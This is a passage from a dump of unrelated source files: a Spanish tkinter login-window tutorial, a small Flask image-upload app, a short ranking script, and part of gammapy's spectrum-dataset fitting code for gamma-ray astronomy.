ttk.Frame(self.__ventana, borderwidth=2,\r\n relief=\"raised\", padding=(10,10))\r\n \r\n # Define el resto de widgets pero en este caso el primer \r\n # paràmetro indica que se situarán en el widget del \r\n # marco anterior 'self.marco'.\r\n \r\n self.usuarioLbl = ttk.Label(self.marco, text=\"Usuario:\",\r\n font=fuente, padding=(5,5))\r\n self.contraseniaLbl = ttk.Label(self.marco, text=\"Contraseña:\",\r\n font=fuente, padding=(5,5))\r\n \r\n # Define variables para las opciones 'textvariable' de\r\n # cada caja de entrada 'ttk.Entry()'.\r\n \r\n self.__usuario = StringVar()\r\n self.__clave = StringVar()\r\n self.__usuario.set('')\r\n self.ctext1 = ttk.Entry(self.marco, textvariable=self.__usuario,\r\n width=30)\r\n self.ctext2 = ttk.Entry(self.marco, textvariable=self.__clave,\r\n show=\"*\", width=30)\r\n self.separ1 = ttk.Separator(self.marco, orient=HORIZONTAL)\r\n self.boton1 = ttk.Button(self.marco, text=\"Aceptar\", \r\n padding=(5,5), command=self.aceptar)\r\n self.boton2 = ttk.Button(self.marco, text=\"Cancelar\", \r\n padding=(5,5), command=quit)\r\n \r\n # Define la ubicación de cada widget en el grid.\r\n # En este ejemplo en realidad hay dos grid (cuadrículas):\r\n # Una cuadrícula de 1fx1c que se encuentra en la ventana \r\n # que ocupará el Frame; y otra en el Frame de 5fx3c para\r\n # el resto de controles.\r\n # La primera fila y primera columna serán la número 0.\r\n # La opción 'column' indica el número de columna y la\r\n # opción 'row' indica el número de fila donde hay que \r\n # colocar un widget. \r\n # La opción 'columnspan' indica al gestor que el \r\n # widget ocupará en total un número determinado de\r\n # columnas. Las cajas para entradas 'self.ctext1' y\r\n # 'self.ctext2' ocuparán dos columnas y la barra\r\n # de separación 'self.separ1' tres.\r\n \r\n self.marco.grid(column=0, row=0)\r\n self.usuarioLbl.grid(column=0, row=0)\r\n self.ctext1.grid(column=1, row=0, columnspan=2)\r\n self.contraseniaLbl.grid(column=0, row=1)\r\n self.ctext2.grid(column=1, row=1, columnspan=2)\r\n self.separ1.grid(column=0, row=3, columnspan=3)\r\n self.boton1.grid(column=1, row=4)\r\n self.boton2.grid(column=2, row=4)\r\n\r\n # Establece el foco en la caja de entrada de la\r\n # contraseña.\r\n\r\n self.ctext1.focus_set()\r\n self.__ventana.mainloop()\r\n \r\n def aceptar(self):\r\n if self.__clave.get() == 'tkinter':\r\n print(\"Acceso permitido\")\r\n print(\"Usuario: \", self.ctext1.get())\r\n print(\"Contraseña:\", self.ctext2.get())\r\n else:\r\n print(\"Acceso denegado\")\r\n self.__clave.set(\"\")\r\n self.ctext2.focus_set()\r\n\r\ndef testAPP():\r\n mi_app = Aplicacion()\r\n return 0\r\n\r\nif __name__ == '__main__':\r\n testAPP()\r\n","sub_path":"ventanaConGeometriaGrid.py","file_name":"ventanaConGeometriaGrid.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"99468704","text":"from flask import Flask, render_template, request, session, url_for\nfrom flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class\nimport os\nfrom analysis import Distance\n\nfrom flask_dropzone import Dropzone\nfrom flask_sqlalchemy import SQLAlchemy\n\n# Load Model Class\nfrom turi_model import TuriObj\nfrom db_model import DBObj\nimport pandas as pd\nimport sqlite3\n\n# db Config\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///model/mark.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SECRET_KEY'] = 'mark'\n\n# Dropzone settings\napp.config['DROPZONE_UPLOAD_MULTIPLE'] = True\napp.config['DROPZONE_ALLOWED_FILE_CUSTOM'] = True\napp.config['DROPZONE_ALLOWED_FILE_TYPE'] = 'image/*'\napp.config['DROPZONE_REDIRECT_VIEW'] = 'results'\n\n# Uploads settings\napp.config['UPLOADED_PHOTOS_DEST'] = os.getcwd() + '/static/assets/file-upload'\n\n# Activate app\ndropzone = Dropzone(app)\ndb = SQLAlchemy(app)\n\n\n# Connect Upload Router\nphotos = UploadSet('photos', IMAGES)\nconfigure_uploads(app, photos)\npatch_request_class(app) # set maximum file size, default is 16MB\n\na = TuriObj()\nb = Distance()\nsql_obj = DBObj()\n\n\n@app.route('/')\ndef hello_world():\n return render_template('basic.html', sql_obj= sql_obj.obj_list, Distance = b)\n\n\n@app.route('/test', methods=['POST', 'GET'])\ndef upload():\n print('test start')\n if \"file_urls\" not in session:\n session['file_urls'] = \"../../static/assets/img/samsung.jpg\"\n # list to hold our uploaded image urls\n file_urls = session['file_urls']\n\n # handle image upload from Dropszone\n if request.method == 'POST':\n file_obj = request.files\n for f in file_obj:\n file = request.files.get(f)\n\n # save the file with to our photos folder\n filename = photos.save(\n file,\n name=file.filename\n )\n\n # append image urls\n file_urls = photos.url(filename)\n\n session['file_urls'] = file_urls\n print('uploding')\n return \"uploading...\"\n # return dropzone template on GET request\n print('test end2')\n return 'good'\n\n\n@app.route('/results')\ndef results():\n # set the file_urls and remove the session variable\n file_url = session['file_urls']\n a.create_sample(file_url)\n a.create_list()\n return render_template('basic.html', file_url=file_url, Distance = b)\n\n\n@app.route('/start')\ndef start():\n sql_obj.open(\"model/mark.db\")\n b.set_graph()\n sql_obj.obj_list = []\n for i in a.pathlist:\n sql_obj.obj_list.append(sql_obj.find(i))\n return render_template('basic.html', file_url=session['file_urls'], Distance= b, sql_obj=sql_obj.obj_list, turi = a.distance_list)\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20016901","text":"a = list(map(int, input().split()))\nn = int(input())\nif n > a[0]:\n print(1)\nelse:\n for i in range(len(a) - 1):\n if a[i] >= n > a[i + 1]:\n print(i + 2)\n break\n else:\n print(len(a) + 1)\n","sub_path":"22_5.py","file_name":"22_5.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351897260","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom collections import OrderedDict\nfrom pathlib import Path\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.io import fits\nfrom astropy.table import Table\nfrom gammapy.data import ObservationStats\nfrom gammapy.irf import EffectiveAreaTable, EnergyDispersion, IRFStacker\nfrom gammapy.stats import cash, wstat\nfrom gammapy.utils.fits import energy_axis_to_ebounds\nfrom gammapy.utils.fitting import Dataset, Parameters\nfrom gammapy.utils.random import get_random_state\nfrom gammapy.utils.scripts import make_path\nfrom .core import CountsSpectrum\nfrom .utils import SpectrumEvaluator\n\n__all__ = [\"SpectrumDatasetOnOff\", \"SpectrumDataset\", \"SpectrumDatasetOnOffStacker\"]\n\n\nclass SpectrumDataset(Dataset):\n \"\"\"Spectrum dataset for likelihood fitting.\n\n The spectrum dataset bundles reduced counts data, with a spectral model,\n background model and instrument response function to compute the fit-statistic\n given the current model and data.\n\n Parameters\n ----------\n model : `~gammapy.spectrum.models.SpectralModel`\n Fit model\n counts : `~gammapy.spectrum.CountsSpectrum`\n Counts spectrum\n livetime : `~astropy.units.Quantity`\n Livetime\n aeff : `~gammapy.irf.EffectiveAreaTable`\n Effective area\n edisp : `~gammapy.irf.EnergyDispersion`\n Energy dispersion\n background : `~gammapy.spectrum.CountsSpectrum`\n Background to use for the fit.\n mask_safe : `~numpy.ndarray`\n Mask defining the safe data range.\n mask_fit : `~numpy.ndarray`\n Mask to apply to the likelihood for fitting.\n obs_id : int or list of int\n Observation id(s) corresponding to the (stacked) dataset.\n gti : '~gammapy.data.gti.GTI'\n GTI of the observation or union of GTI if it is a stacked observation\n\n See Also\n --------\n SpectrumDatasetOnOff, FluxPointsDataset, MapDataset\n\n \"\"\"\n\n likelihood_type = \"cash\"\n\n def __init__(\n self,\n model=None,\n counts=None,\n livetime=None,\n aeff=None,\n edisp=None,\n background=None,\n mask_safe=None,\n mask_fit=None,\n obs_id=None,\n gti=None,\n ):\n if mask_fit is not None and mask_fit.dtype != np.dtype(\"bool\"):\n raise ValueError(\"mask data must have dtype bool\")\n\n self.counts = counts\n\n if livetime is not None:\n livetime = u.Quantity(livetime)\n\n self.livetime = livetime\n self.mask_fit = mask_fit\n self.aeff = aeff\n self.edisp = edisp\n self.background = background\n self.model = model\n self.mask_safe = mask_safe\n self.obs_id = obs_id\n self.gti = gti\n\n def __repr__(self):\n str_ = self.__class__.__name__\n return str_\n\n def __str__(self):\n str_ = self.__class__.__name__\n str_ += \"\\n\\n\"\n counts = np.nan\n if self.counts is not None:\n counts = np.sum(self.counts.data)\n str_ += \"\\t{:32}: {:.0f} \\n\".format(\"Total counts\", counts)\n\n npred = np.nan\n if self.model is not None:\n npred = np.sum(self.npred().data)\n str_ += \"\\t{:32}: {:.2f}\\n\".format(\"Total predicted counts\", npred)\n\n counts_off = np.nan\n if getattr(self, \"counts_off\", None) is not None:\n counts_off = np.sum(self.counts_off.data)\n str_ += \"\\t{:32}: {:.2f}\\n\\n\".format(\"Total off counts\", counts_off)\n\n aeff_min, aeff_max, aeff_unit = np.nan, np.nan, \"\"\n if self.aeff is not None:\n aeff_min = np.min(self.aeff.data.data.value[self.aeff.data.data.value > 0])\n aeff_max = np.max(self.aeff.data.data.value)\n aeff_unit = self.aeff.data.data.unit\n\n str_ += \"\\t{:32}: {:.2e} {}\\n\".format(\"Effective area min\", aeff_min, aeff_unit)\n str_ += \"\\t{:32}: {:.2e} {}\\n\\n\".format(\n \"Effective area max\", aeff_max, aeff_unit\n )\n\n livetime = np.nan\n if self.livetime is not None:\n livetime = self.livetime\n str_ += \"\\t{:32}: {:.2e}\\n\\n\".format(\"Livetime\", livetime)\n\n # data section\n n_bins = 0\n if self.counts is not None:\n n_bins = self.counts.data.size\n str_ += \"\\t{:32}: {} \\n\".format(\"Number of total bins\", n_bins)\n\n n_fit_bins = 0\n if self.mask is not None:\n n_fit_bins = np.sum(self.mask)\n str_ += \"\\t{:32}: {} \\n\\n\".format(\"Number of fit bins\", n_fit_bins)\n\n # likelihood section\n str_ += \"\\t{:32}: {}\\n\".format(\"Fit statistic type\", self.likelihood_type)\n\n stat = np.nan\n if self.model is not None:\n stat = self.likelihood()\n str_ += \"\\t{:32}: {:.2f}\\n\\n\".format(\"Fit statistic value (-2 log(L))\", stat)\n\n n_pars, n_free_pars = 0, 0\n if self.model is not None:\n n_pars = len(self.model.parameters.parameters)\n n_free_pars = len(self.parameters.free_parameters)\n\n str_ += \"\\t{:32}: {}\\n\".format(\"Number of parameters\", n_pars)\n str_ += \"\\t{:32}: {}\\n\\n\".format(\"Number of free parameters\", n_free_pars)\n\n if self.model is not None:\n str_ += \"\\t{:32}: {}\\n\".format(\"Model type\", self.model.__class__.__name__)\n info = str(self.model.parameters)\n lines = info.split(\"\\n\")\n for line in lines[2:-1]:\n str_ += \"\\t\" + line.replace(\":\", \"\\t:\") + \"\\n\"\n\n return str_.expandtabs(tabsize=4)\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, model):\n self._model = model\n if model is not None:\n self._parameters = Parameters(self._model.parameters.parameters)\n self._predictor = SpectrumEvaluator(\n model=self.model,\n livetime=self.livetime,\n aeff=self.aeff,\n e_true=self._energy_axis.edges,\n edisp=self.edisp,\n )\n else:\n self._parameters = None\n self._predictor = None\n\n @property\n def parameters(self):\n if self._parameters is None:\n raise AttributeError(\"No model set for Dataset\")\n else:\n return self._parameters\n\n @property\n def _energy_axis(self):\n if self.counts is not None:\n e_axis = self.counts.energy\n elif self.edisp is not None:\n e_axis = self.edisp.data.axis(\"e_reco\")\n elif self.aeff is not None:\n # assume e_reco = e_true\n e_axis = self.aeff.data.axis(\"energy\")\n return e_axis\n\n @property\n def data_shape(self):\n \"\"\"Shape of the counts data\"\"\"\n return (self._energy_axis.nbin,)\n\n def npred(self):\n \"\"\"Returns npred map (model + background)\"\"\"\n if self._predictor is None:\n raise AttributeError(\"No model set for Dataset\")\n npred = self._predictor.compute_npred()\n if self.background:\n npred.data += self.background.data\n return npred\n\n def likelihood_per_bin(self):\n \"\"\"Likelihood per bin given the current model parameters\"\"\"\n return cash(n_on=self.counts.data, mu_on=self.npred().data)\n\n def _as_counts_spectrum(self, data):\n energy = self.counts.energy.edges\n return CountsSpectrum(data=data, energy_lo=energy[:-1], energy_hi=energy[1:])\n\n @property\n def excess(self):\n \"\"\"Excess (counts - alpha * counts_off)\"\"\"\n excess = self.counts.data - self.background.data\n return self._as_counts_spectrum(excess)\n\n def fake(self, random_state=\"random-seed\"):\n \"\"\"Simulate fake counts for the current model and reduced irfs.\n\n This method overwrites the counts defined on the dataset object.\n\n Parameters\n ----------\n random_state : {int, 'random-seed', 'global-rng', `~numpy.random.RandomState`}\n Defines random number generator initialisation.\n Passed to `~gammapy.utils.random.get_random_state`.\n \"\"\"\n random_state = get_random_state(random_state)\n npred = self.npred()\n npred.data = random_state.poisson(npred.data)\n self.counts = npred\n\n @property\n def energy_range(self):\n \"\"\"Energy range defined by the safe mask\"\"\"\n energy = self.counts.energy.edges\n e_lo = energy[:-1][self.mask_safe]\n e_hi = energy[1:][self.mask_safe]\n return u.Quantity([e_lo.min(), e_hi.max()])\n\n def plot_fit(self):\n \"\"\"Plot counts and residuals in two panels.\n\n Calls ``plot_counts`` and ``plot_residuals``.\n \"\"\"\n from matplotlib.gridspec import GridSpec\n import matplotlib.pyplot as plt\n\n gs = GridSpec(7, 1)\n\n ax_spectrum = plt.subplot(gs[:5, :])\n self.plot_counts(ax=ax_spectrum)\n\n ax_spectrum.set_xticks([])\n\n ax_residuals = plt.subplot(gs[5:, :])\n self.plot_residuals(ax=ax_residuals)\n return ax_spectrum, ax_residuals\n\n @property\n def _e_unit(self):\n return self.counts.energy.unit\n\n def plot_counts(self, ax=None):\n \"\"\"Plot predicted and detected counts.\n\n Parameters\n ----------\n ax : `~matplotlib.pyplot.Axes`\n Axes object.\n\n Returns\n -------\n ax : `~matplotlib.pyplot.Axes`\n Axes object.\n \"\"\"\n import matplotlib.pyplot as plt\n\n ax = plt.gca() if ax is None else ax\n\n self.npred().plot(ax=ax, label=\"mu_src\", energy_unit=self._e_unit)\n self.excess.plot(ax=ax, label=\"Excess\", fmt=\".\", energy_unit=self._e_unit)\n\n e_min, e_max = self.energy_range\n kwargs = {\"color\": \"black\", \"linestyle\": \"dashed\"}\n ax.axvline(e_min.to_value(self._e_unit), label=\"fit range\", **kwargs)\n ax.axvline(e_max.to_value(self._e_unit), **kwargs)\n\n ax.legend(numpoints=1)\n ax.set_title(\"\")\n return ax\n\n def residuals(self, method=\"diff\"):\n \"\"\"Compute the spectral residuals.\n\n Parameters\n ----------\n method: {\"diff\", \"diff/model\", \"diff/sqrt(model)\"}\n Method used to compute the residuals. Available options are:\n - `diff` (default): data - model\n - `diff/model`: (data - model) / model\n - `diff/sqrt(model)`: (data - model) / sqrt(model)\n\n Returns\n -------\n residuals : `CountsSpectrum`\n Residual spectrum.\n \"\"\"\n\n residuals = self._compute_residuals(self.counts, self.npred(), method)\n return residuals\n\n def plot_residuals(self, method=\"diff\", ax=None, **kwargs):\n \"\"\"Plot residuals.\n\n Parameters\n ----------\n ax : `~matplotlib.pyplot.Axes`\n Axes object.\n method : {\"diff\", \"diff/model\", \"diff/sqrt(model)\"}\n Normalization used to compute the residuals, see `SpectrumDataset.residuals()`\n **kwargs : dict\n Keywords passed to `CountsSpectrum.plot()`\n\n Returns\n -------\n ax : `~matplotlib.pyplot.Axes`\n Axes object.\n \"\"\"\n import matplotlib.pyplot as plt\n\n ax = plt.gca() if ax is None else ax\n\n residuals = self.residuals(method=method)\n label = self._residuals_labels[method]\n\n residuals.plot(\n ax=ax, ecolor=\"black\", fmt=\"none\", energy_unit=self._e_unit, **kwargs\n )\n ax.axhline(0, color=\"black\", lw=0.5)\n\n ymax = 1.2 * np.nanmax(residuals.data)\n ax.set_ylim(-ymax, ymax)\n\n ax.set_xlabel(\"Energy [{}]\".format(self._e_unit))\n ax.set_ylabel(\"Residuals ({})\".format(label))\n return ax\n\n\nclass SpectrumDatasetOnOff(SpectrumDataset):\n \"\"\"Spectrum dataset for on-off likelihood fitting.\n\n The on-off spectrum dataset bundles reduced counts data, off counts data,\n with a spectral model, relative background efficiency and instrument\n response functions to compute the fit-statistic given the current model\n and data.\n\n Parameters\n ----------\n model : `~gammapy.spectrum.models.SpectralModel`\n Fit model\n counts : `~gammapy.spectrum.CountsSpectrum`\n ON Counts spectrum\n counts_off : `~gammapy.spectrum.CountsSpectrum`\n OFF Counts spectrum\n livetime : `~astropy.units.Quantity`\n Livetime\n aeff : `~gammapy.irf.EffectiveAreaTable`\n Effective area\n edisp : `~gammapy.irf.EnergyDispersion`\n Energy dispersion\n mask_safe : `~numpy.array`\n Mask defining the safe data range.\n mask_fit : `~numpy.array`\n Mask to apply to the likelihood for fitting.\n acceptance : `~numpy.array` or float\n Relative background efficiency in the on region.\n acceptance_off : `~numpy.array` or float\n Relative background efficiency in the off region.\n obs_id : int or list of int\n Observation id(s) corresponding to the (stacked) dataset.\n gti : '~gammapy.data.gti.GTI'\n GTI of the observation or union of GTI if it is a stacked observation\n\n See Also\n --------\n SpectrumDataset, FluxPointsDataset, MapDataset\n\n \"\"\"\n\n likelihood_type = \"wstat\"\n\n def __init__(\n self,\n model=None,\n counts=None,\n counts_off=None,\n livetime=None,\n aeff=None,\n edisp=None,\n mask_safe=None,\n mask_fit=None,\n acceptance=None,\n acceptance_off=None,\n obs_id=None,\n gti=None,\n ):\n\n self.counts = counts\n self.counts_off = counts_off\n\n if livetime is not None:\n livetime = u.Quantity(livetime)\n\n self.livetime = livetime\n self.mask_fit = mask_fit\n self.aeff = aeff\n self.edisp = edisp\n self.model = model\n self.mask_safe = mask_safe\n\n if np.isscalar(acceptance):\n acceptance = np.ones(self.data_shape) * acceptance\n\n if np.isscalar(acceptance_off):\n acceptance_off = np.ones(self.data_shape) * acceptance_off\n\n self.acceptance = acceptance\n self.acceptance_off = acceptance_off\n self.obs_id = obs_id\n self.gti = gti\n\n def __repr__(self):\n str_ = self.__class__.__name__\n return str_\n\n def __str__(self):\n str_ = super().__str__()\n\n acceptance = np.nan\n if self.acceptance is not None:\n acceptance = np.mean(self.acceptance)\n\n str_ += \"\\t{:32}: {}\\n\".format(\"Acceptance mean:\", acceptance)\n return str_.expandtabs(tabsize=4)\n\n @property\n def background(self):\n \"\"\"\"\"\"\n background = self.alpha * self.counts_off.data\n return self._as_counts_spectrum(background)\n\n @property\n def alpha(self):\n \"\"\"Exposure ratio between signal and background regions\"\"\"\n return self.acceptance / self.acceptance_off\n\n def npred_sig(self):\n \"\"\"Predicted counts from source model (`CountsSpectrum`).\"\"\"\n if self._predictor is None:\n raise AttributeError(\"No model set for this Dataset\")\n npred = self._predictor.compute_npred()\n return npred\n\n def likelihood_per_bin(self):\n \"\"\"Likelihood per bin given the current model parameters\"\"\"\n mu_sig = self.npred_sig().data\n on_stat_ = wstat(\n n_on=self.counts.data,\n n_off=self.counts_off.data,\n alpha=self.alpha,\n mu_sig=mu_sig,\n )\n return np.nan_to_num(on_stat_)\n\n def fake(self, background_model, random_state=\"random-seed\"):\n \"\"\"Simulate fake counts for the current model and reduced irfs.\n\n This method overwrites the counts and off counts defined on the dataset object.\n\n\n Parameters\n ----------\n background_model : `~gammapy.spectrum.CountsSpectrum`\n BackgroundModel. In the future will be part of the SpectrumDataset Class.\n For the moment, a CountSpectrum.\n random_state : {int, 'random-seed', 'global-rng', `~numpy.random.RandomState`}\n Defines random number generator initialisation.\n Passed to `~gammapy.utils.random.get_random_state`.\n \"\"\"\n random_state = get_random_state(random_state)\n\n npred_sig = self.npred_sig()\n npred_sig.data = random_state.poisson(npred_sig.data)\n\n npred_bkg = background_model.copy()\n npred_bkg.data = random_state.poisson(npred_bkg.data)\n\n self.counts = npred_sig + npred_bkg\n\n npred_off = background_model / self.alpha\n npred_off.data = random_state.poisson(npred_off.data)\n self.counts_off = npred_off\n\n @classmethod\n def read(cls, filename):\n \"\"\"Read from file\n\n For now, filename is assumed to the name of a PHA file where BKG file, ARF, and RMF names\n must be set in the PHA header and be present in the same folder\n\n Parameters\n ----------\n filename : str\n OGIP PHA file to read\n \"\"\"\n raise NotImplementedError(\n \"To read from an OGIP fits file use SpectrumDatasetOnOff.from_ogip_files.\"\n )\n\n def peek(self, figsize=(10, 10)):\n \"\"\"Quick-look summary plots.\"\"\"\n import matplotlib.pyplot as plt\n\n e_min, e_max = self.energy_range\n\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2, figsize=figsize)\n\n ax1.set_title(\"Counts\")\n energy_unit = \"TeV\"\n\n if self.counts_off is not None:\n self.background.plot_hist(\n ax=ax1, label=\"alpha * n_off\", color=\"darkblue\", energy_unit=energy_unit\n )\n\n self.counts.plot_hist(\n ax=ax1,\n label=\"n_on\",\n color=\"darkred\",\n energy_unit=energy_unit,\n show_energy=(e_min, e_max),\n )\n\n ax1.set_xlim(\n 0.7 * e_min.to_value(energy_unit), 1.3 * e_max.to_value(energy_unit)\n )\n ax1.legend(numpoints=1)\n\n ax2.set_title(\"Effective Area\")\n e_unit = self.aeff.energy.unit\n self.aeff.plot(ax=ax2, show_energy=(e_min, e_max))\n ax2.set_xlim(0.7 * e_min.to_value(e_unit), 1.3 * e_max.to_value(e_unit))\n\n ax3.axis(\"off\")\n\n if self.counts_off is not None:\n stats = ObservationStats(**self._info_dict(in_safe_energy_range=True))\n ax3.text(0, 0.2, \"{}\".format(stats), fontsize=12)\n\n ax4.set_title(\"Energy Dispersion\")\n if self.edisp is not None:\n self.edisp.plot_matrix(ax=ax4)\n\n # TODO: optimize layout\n plt.subplots_adjust(wspace=0.3)\n\n def to_ogip_files(self, outdir=None, use_sherpa=False, overwrite=False):\n \"\"\"Write OGIP files.\n\n If you want to use the written files with Sherpa you have to set the\n ``use_sherpa`` flag. Then all files will be written in units 'keV' and\n 'cm2'.\n\n Parameters\n ----------\n outdir : `pathlib.Path`\n output directory, default: pwd\n use_sherpa : bool, optional\n Write Sherpa compliant files, default: False\n overwrite : bool\n Overwrite existing files?\n \"\"\"\n # TODO: refactor and reduce amount of code duplication\n outdir = Path.cwd() if outdir is None else make_path(outdir)\n outdir.mkdir(exist_ok=True, parents=True)\n\n if isinstance(self.obs_id, list):\n phafile = \"pha_stacked.fits\"\n else:\n phafile = \"pha_obs{}.fits\".format(self.obs_id)\n\n bkgfile = phafile.replace(\"pha\", \"bkg\")\n arffile = phafile.replace(\"pha\", \"arf\")\n rmffile = phafile.replace(\"pha\", \"rmf\")\n\n counts_table = self.counts.to_table()\n counts_table[\"QUALITY\"] = np.logical_not(self.mask_safe)\n counts_table[\"BACKSCAL\"] = self.acceptance\n counts_table[\"AREASCAL\"] = np.ones(self.acceptance.size)\n meta = self._ogip_meta()\n\n meta[\"respfile\"] = rmffile\n meta[\"backfile\"] = bkgfile\n meta[\"ancrfile\"] = arffile\n meta[\"hduclas2\"] = \"TOTAL\"\n counts_table.meta = meta\n\n name = counts_table.meta[\"name\"]\n hdu = fits.BinTableHDU(counts_table, name=name)\n hdulist = fits.HDUList([fits.PrimaryHDU(), hdu, self._ebounds_hdu(use_sherpa)])\n\n hdulist.writeto(str(outdir / phafile), overwrite=overwrite)\n\n self.aeff.write(outdir / arffile, overwrite=overwrite, use_sherpa=use_sherpa)\n\n if self.counts_off is not None:\n counts_off_table = self.counts_off.to_table()\n counts_off_table[\"QUALITY\"] = np.logical_not(self.mask_safe)\n counts_off_table[\"BACKSCAL\"] = self.acceptance_off\n counts_off_table[\"AREASCAL\"] = np.ones(self.acceptance.size)\n meta = self._ogip_meta()\n meta[\"hduclas2\"] = \"BKG\"\n\n counts_off_table.meta = meta\n name = counts_off_table.meta[\"name\"]\n hdu = fits.BinTableHDU(counts_off_table, name=name)\n hdulist = fits.HDUList(\n [fits.PrimaryHDU(), hdu, self._ebounds_hdu(use_sherpa)]\n )\n hdulist.writeto(str(outdir / bkgfile), overwrite=overwrite)\n\n if self.edisp is not None:\n self.edisp.write(\n str(outdir / rmffile), overwrite=overwrite, use_sherpa=use_sherpa\n )\n\n def _ebounds_hdu(self, use_sherpa):\n energy = self.counts.energy.edges\n\n if use_sherpa:\n energy = energy.to(\"keV\")\n\n return energy_axis_to_ebounds(energy)\n\n def _ogip_meta(self):\n \"\"\"Meta info for the OGIP data format\"\"\"\n meta = OrderedDict()\n meta[\"name\"] = \"SPECTRUM\"\n meta[\"hduclass\"] = \"OGIP\"\n meta[\"hduclas1\"] = \"SPECTRUM\"\n meta[\"corrscal\"] = \"\"\n meta[\"chantype\"] = \"PHA\"\n meta[\"detchans\"] = self.counts.energy.nbin\n meta[\"filter\"] = \"None\"\n meta[\"corrfile\"] = \"\"\n meta[\"poisserr\"] = True\n meta[\"hduclas3\"] = \"COUNT\"\n meta[\"hduclas4\"] = \"TYPE:1\"\n meta[\"lo_thres\"] = self.energy_range[0].to_value(\"TeV\")\n meta[\"hi_thres\"] = self.energy_range[1].to_value(\"TeV\")\n meta[\"exposure\"] = self.livetime.to_value(\"s\")\n meta[\"obs_id\"] = self.obs_id\n return meta\n\n @classmethod\n def from_ogip_files(cls, filename):\n \"\"\"Read `~gammapy.spectrum.SpectrumDatasetOnOff` from OGIP files.\n\n BKG file, ARF, and RMF must be set in the PHA header and be present in\n the same folder.\n\n Parameters\n ----------\n filename : str\n OGIP PHA file to read\n \"\"\"\n filename = make_path(filename)\n dirname = filename.parent\n\n with fits.open(str(filename), memmap=False) as hdulist:\n data = _read_ogip_hdulist(hdulist)\n\n counts = CountsSpectrum(\n energy_hi=data[\"energy_hi\"], energy_lo=data[\"energy_lo\"], data=data[\"data\"]\n )\n\n phafile = filename.name\n\n try:\n rmffile = phafile.replace(\"pha\", \"rmf\")\n energy_dispersion = EnergyDispersion.read(str(dirname / rmffile))\n except IOError:\n # TODO : Add logger and echo warning\n energy_dispersion = None\n\n try:\n bkgfile = phafile.replace(\"pha\", \"bkg\")\n filename = str(dirname / bkgfile)\n\n with fits.open(str(filename), memmap=False) as hdulist:\n data_bkg = _read_ogip_hdulist(hdulist)\n counts_off = CountsSpectrum(\n energy_hi=data_bkg[\"energy_hi\"],\n energy_lo=data_bkg[\"energy_lo\"],\n data=data_bkg[\"data\"],\n )\n\n acceptance_off = data_bkg[\"backscal\"]\n except IOError:\n # TODO : Add logger and echo warning\n counts_off, acceptance_off = None, None\n\n arffile = phafile.replace(\"pha\", \"arf\")\n aeff = EffectiveAreaTable.read(str(dirname / arffile))\n\n mask_safe = np.logical_not(data[\"quality\"])\n\n return cls(\n counts=counts,\n aeff=aeff,\n counts_off=counts_off,\n edisp=energy_dispersion,\n livetime=data[\"livetime\"],\n mask_safe=mask_safe,\n acceptance=data[\"backscal\"],\n acceptance_off=acceptance_off,\n obs_id=data[\"obs_id\"],\n )\n\n # TODO: decide on a design for dataset info tables / dicts and make it part\n # of the public API\n def _info_dict(self, in_safe_energy_range=False):\n \"\"\"Info dict\"\"\"\n info = dict()\n mask = self.mask_safe if in_safe_energy_range else slice(None)\n\n # TODO: handle energy dependent a_on / a_off\n info[\"a_on\"] = self.acceptance[0]\n info[\"n_on\"] = self.counts.data[mask].sum()\n\n if self.counts_off is not None:\n info[\"n_off\"] = self.counts_off.data[mask].sum()\n info[\"a_off\"] = self.acceptance_off[0]\n else:\n info[\"n_off\"] = 0\n info[\"a_off\"] = 1\n\n info[\"livetime\"] = self.livetime\n info[\"obs_id\"] = self.obs_id\n return info\n\n\ndef _read_ogip_hdulist(hdulist, hdu1=\"SPECTRUM\", hdu2=\"EBOUNDS\"):\n \"\"\"Create from `~astropy.io.fits.HDUList`.\"\"\"\n counts_table = Table.read(hdulist[hdu1])\n ebounds = Table.read(hdulist[hdu2])\n emin = ebounds[\"E_MIN\"].quantity\n emax = ebounds[\"E_MAX\"].quantity\n\n # Check if column are present in the header\n quality = None\n areascal = None\n backscal = None\n\n if \"QUALITY\" in counts_table.colnames:\n quality = counts_table[\"QUALITY\"].data\n if \"AREASCAL\" in counts_table.colnames:\n areascal = counts_table[\"AREASCAL\"].data\n if \"BACKSCAL\" in counts_table.colnames:\n backscal = counts_table[\"BACKSCAL\"].data\n\n return dict(\n data=counts_table[\"COUNTS\"],\n backscal=backscal,\n energy_lo=emin,\n energy_hi=emax,\n quality=quality,\n areascal=areascal,\n livetime=counts_table.meta[\"EXPOSURE\"] * u.s,\n obs_id=counts_table.meta[\"OBS_ID\"],\n is_bkg=False,\n )\n\n\nclass SpectrumDatasetOnOffStacker:\n r\"\"\"Stack a list of homogeneous datasets.\n\n The stacking of :math:`j` datasets is implemented as follows.\n :math:`k` and :math:`l` denote a bin in reconstructed and true energy,\n respectively.\n\n .. math::\n \\epsilon_{jk} =\\left\\{\\begin{array}{cl} 1, & \\mbox{if\n bin k is inside the energy thresholds}\\\\ 0, & \\mbox{otherwise} \\end{array}\\right.\n\n \\overline{\\mathrm{n_{on}}}_k = \\sum_{j} \\mathrm{n_{on}}_{jk} \\cdot\n \\epsilon_{jk}\n\n \\overline{\\mathrm{n_{off}}}_k = \\sum_{j} \\mathrm{n_{off}}_{jk} \\cdot\n \\epsilon_{jk}\n\n \\overline{\\alpha}_k =\n \\frac{\\overline{{b_{on}}}_k}{\\overline{{b_{off}}}_k}\n\n \\overline{{b}_{on}}_k = 1\n\n \\overline{{b}_{off}}_k = \\frac{1}{\\sum_{j}\\alpha_{jk} \\cdot\n \\mathrm{n_{off}}_{jk} \\cdot \\epsilon_{jk}} \\cdot \\overline{\\mathrm {n_{off}}}\n\n 